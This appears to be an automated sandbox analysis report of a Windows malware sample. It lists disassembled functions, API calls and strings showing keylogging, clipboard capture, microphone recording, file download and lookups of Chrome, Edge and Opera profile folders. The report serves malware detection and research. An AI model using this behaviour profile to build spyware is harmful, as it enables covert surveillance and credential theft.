                          • Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
                          • Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C594
                        • Sleep.KERNEL32(000001F4), ref: 0040A573
                        • Sleep.KERNEL32(00000064), ref: 0040A5FD
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Window$SleepText$ForegroundLength
                        • String ID: [ $ ]
                        • API String ID: 3309952895-93608704
                        • Opcode ID: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
                        • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
                        • Opcode Fuzzy Hash: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
                        • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
                        Function 00443A33 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                        • Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
                        • Opcode Fuzzy Hash: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                        • Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
                        Function 00443AB2 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                        • Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
                        • Opcode Fuzzy Hash: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                        • Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169
                        Function 0041C485 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                        • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4B2
                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4D7
                        • CloseHandle.KERNEL32(00000000,?,00000000,0040412F,00465E74), ref: 0041C4E5
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseCreateHandleReadSize
                        • String ID:
                        • API String ID: 3919263394-0
                        • Opcode ID: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
                        • Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
                        • Opcode Fuzzy Hash: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
                        • Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
                        Function 0041C1DD Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                        Download Yara Rule
                        APIs
                        • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                        • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                        • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C233
                        • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C23B
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseHandleOpenProcess
                        • String ID:
                        • API String ID: 39102293-0
                        • Opcode ID: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
                        • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
                        • Opcode Fuzzy Hash: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
                        • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
                        Function 00439863 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                          • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                        • _UnwindNestedFrames.LIBCMT ref: 00439891
                        • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                        • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                        • String ID:
                        • API String ID: 2633735394-0
                        • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                        • Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
                        • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                        • Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
                        Function 004193E3 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                        Download Yara Rule
                        APIs
                        • GetSystemMetrics.USER32(0000004C), ref: 004193F0
                        • GetSystemMetrics.USER32(0000004D), ref: 004193F6
                        • GetSystemMetrics.USER32(0000004E), ref: 004193FC
                        • GetSystemMetrics.USER32(0000004F), ref: 00419402
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: MetricsSystem
                        • String ID:
                        • API String ID: 4116985748-0
                        • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                        • Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
                        • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                        • Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
                        Function 00438F31 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                        Download Yara Rule
                        APIs
                        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
                        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
                        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                          • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
                        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                        • String ID:
                        • API String ID: 1761009282-0
                        • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                        • Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
                        • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                        • Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F
                        Function 00449E3C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • WideCharToMultiByte.KERNEL32(000000FF,00000000,00000006,00000001,?,?,00000000,?,00000000,?,?,00000000,00000006,?,?,?), ref: 00449F0F
                        • GetLastError.KERNEL32 ref: 00449F2B
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharErrorLastMultiWide
                        • String ID: PkGNG
                        • API String ID: 203985260-263838557
                        • Opcode ID: 8762d6c9eb8cd6bb849928aa97b0b7335ecf1b8cbe6ccd937ce160abea437523
                        • Instruction ID: 5218313022fb824330162c1b3e1e252a07855a0508c927524b2412b0d5c8e50b
                        • Opcode Fuzzy Hash: 8762d6c9eb8cd6bb849928aa97b0b7335ecf1b8cbe6ccd937ce160abea437523
                        • Instruction Fuzzy Hash: A531F831600205EBEB21EF56C845BAB77A8DF55711F24416BF9048B3D1DB38CD41E7A9
                        Function 0040B748 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                        • __Init_thread_footer.LIBCMT ref: 0040B797
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Init_thread_footer__onexit
                        • String ID: [End of clipboard]$[Text copied to clipboard]
                        • API String ID: 1881088180-3686566968
                        • Opcode ID: 60402113f4b18a007ad5d9fa0adee8409e9b11ca3b01e04d5642538178529adf
                        • Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
                        • Opcode Fuzzy Hash: 60402113f4b18a007ad5d9fa0adee8409e9b11ca3b01e04d5642538178529adf
                        • Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
                        Function 00451B37 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: ACP$OCP
                        • API String ID: 0-711371036
                        • Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                        • Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
                        • Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                        • Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C
                        Function 0044B731 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81fileCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB6E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B7DB
                        • GetLastError.KERNEL32 ref: 0044B804
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorFileLastWrite
                        • String ID: PkGNG
                        • API String ID: 442123175-263838557
                        • Opcode ID: e2af8d231f6539d56f2593d6ace3ed0d4bab48f660b2d85d051dab4aa689f9d2
                        • Instruction ID: 56933c973e2243a1a9a6e47b5ff38ff3048756f5123006952a384074424e161b
                        • Opcode Fuzzy Hash: e2af8d231f6539d56f2593d6ace3ed0d4bab48f660b2d85d051dab4aa689f9d2
                        • Instruction Fuzzy Hash: 12319331A00619DBCB24CF59CD809DAB3F9EF88311F1445AAE509D7361D734ED81CB68
                        Function 0044B652 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB8E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B6ED
                        • GetLastError.KERNEL32 ref: 0044B716
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorFileLastWrite
                        • String ID: PkGNG
                        • API String ID: 442123175-263838557
                        • Opcode ID: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
                        • Instruction ID: 12ef57d8ab414bd2a6c5914f5c8b73f84ca543b1ee1fc2f1adbb6bb6aefc8993
                        • Opcode Fuzzy Hash: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
                        • Instruction Fuzzy Hash: 6C21B435600219DFCB14CF69C980BE9B3F8EB48302F1044AAE94AD7351D734ED81CB64
                        Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                        Download Yara Rule
                        APIs
                        • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                        • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
                        Strings
                        • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: LocalTime
                        • String ID: KeepAlive | Enabled | Timeout:
                        • API String ID: 481472006-1507639952
                        • Opcode ID: 2607bdc9f0d933924e59b09d9b4d17e10e2c88dcc52cf24d6e3d3c5d02c0a6dc
                        • Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
                        • Opcode Fuzzy Hash: 2607bdc9f0d933924e59b09d9b4d17e10e2c88dcc52cf24d6e3d3c5d02c0a6dc
                        • Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF
                        Function 0041663B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON
                        Download Yara Rule
                        APIs
                        • Sleep.KERNEL32 ref: 00416640
                        • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: DownloadFileSleep
                        • String ID: !D@
                        • API String ID: 1931167962-604454484
                        • Opcode ID: 1ee2299181c43429df041adb64fff50d3160e985c7a9a19c3789c6205816a6ff
                        • Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
                        • Opcode Fuzzy Hash: 1ee2299181c43429df041adb64fff50d3160e985c7a9a19c3789c6205816a6ff
                        • Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A
                        Function 0041AD17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                        Download Yara Rule
                        APIs
                        • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExistsFilePath
                        • String ID: alarm.wav$hYG
                        • API String ID: 1174141254-2782910960
                        • Opcode ID: a80849807d39b6d885b850496f76bbee22079f6d4cd25328039c8df50d7c6aa3
                        • Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
                        • Opcode Fuzzy Hash: a80849807d39b6d885b850496f76bbee22079f6d4cd25328039c8df50d7c6aa3
                        • Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F
                        Function 0040B051 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                          • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                        • CloseHandle.KERNEL32(?), ref: 0040B0B4
                        • UnhookWindowsHookEx.USER32(004750F0), ref: 0040B0C7
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                        • String ID: Online Keylogger Stopped
                        • API String ID: 1623830855-1496645233
                        • Opcode ID: bcbfeeedac202dcce5c27b8ae7271b8f67804fce0d04219dcea429481c7fcc84
                        • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
                        • Opcode Fuzzy Hash: bcbfeeedac202dcce5c27b8ae7271b8f67804fce0d04219dcea429481c7fcc84
                        • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
                        Function 00448BB3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,73E85006,00000001,?,0043CE55), ref: 00448C24
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: String
                        • String ID: LCMapStringEx$PkGNG
                        • API String ID: 2568140703-1065776982
                        • Opcode ID: 20edb6311ff80fd52f273064eb78c9c2f4c40470f2fa2ad589d6478c135721a4
                        • Instruction ID: 91dcaeff4e4508283399e99d6512adb219adb357de156da575c9a111b1dd59a7
                        • Opcode Fuzzy Hash: 20edb6311ff80fd52f273064eb78c9c2f4c40470f2fa2ad589d6478c135721a4
                        • Instruction Fuzzy Hash: 3F016532500209FBCF029F90DC01EEE7F62EF08351F10452AFE0925161CA3A8971AB99
                        Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                        Download Yara Rule
                        APIs
                        • waveInPrepareHeader.WINMM(?,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                        • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: wave$BufferHeaderPrepare
                        • String ID: XMG
                        • API String ID: 2315374483-813777761
                        • Opcode ID: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                        • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                        • Opcode Fuzzy Hash: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                        • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                        Function 00448AE6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: LocaleValid
                        • String ID: IsValidLocaleName$JD
                        • API String ID: 1901932003-2234456777
                        • Opcode ID: 51bc9a782de688291f39784aabc01e809a53b6defb3ea5057969789d83f50679
                        • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
                        • Opcode Fuzzy Hash: 51bc9a782de688291f39784aabc01e809a53b6defb3ea5057969789d83f50679
                        • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
                        Function 0040C4C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                        Download Yara Rule
                        APIs
                        • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExistsFilePath
                        • String ID: UserProfile$\AppData\Local\Google\Chrome\
                        • API String ID: 1174141254-4188645398
                        • Opcode ID: 333e2781ec0ec89fbd88f6f0735ff55aec90b53b609e1a946a8fd7ce7860d637
                        • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
                        • Opcode Fuzzy Hash: 333e2781ec0ec89fbd88f6f0735ff55aec90b53b609e1a946a8fd7ce7860d637
                        • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
                        Function 0040C526 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                        Download Yara Rule
                        APIs
                        • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExistsFilePath
                        • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                        • API String ID: 1174141254-2800177040
                        • Opcode ID: 46641891947e03d640cd62480cc1169afb97d1bf2d9271bf70253981d5b275da
                        • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
                        • Opcode Fuzzy Hash: 46641891947e03d640cd62480cc1169afb97d1bf2d9271bf70253981d5b275da
                        • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
                        Function 0040C589 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                        Download Yara Rule
                        APIs
                        • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5BC
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExistsFilePath
                        • String ID: AppData$\Opera Software\Opera Stable\
                        • API String ID: 1174141254-1629609700
                        • Opcode ID: 776327d6e5661bbd5273f74550199b0ae7763d34e3e9ac4bd8830f7a720e7153
                        • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
                        • Opcode Fuzzy Hash: 776327d6e5661bbd5273f74550199b0ae7763d34e3e9ac4bd8830f7a720e7153
                        • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
                        Function 0040B646 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                        Download Yara Rule
                        APIs
                        • GetKeyState.USER32(00000011), ref: 0040B64B
                          • Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
                          • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                          • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32(00000000), ref: 0040A429
                          • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                          • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
                          • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                          • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                          • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                        • String ID: [AltL]$[AltR]
                        • API String ID: 2738857842-2658077756
                        • Opcode ID: 7258a7f4b132cbc40b361f8d5efa273a6a49595113cd8e0a5555153196a7725b
                        • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
                        • Opcode Fuzzy Hash: 7258a7f4b132cbc40b361f8d5efa273a6a49595113cd8e0a5555153196a7725b
                        • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
                        Function 0044ECEC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                        Download Yara Rule
                        APIs
                        • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
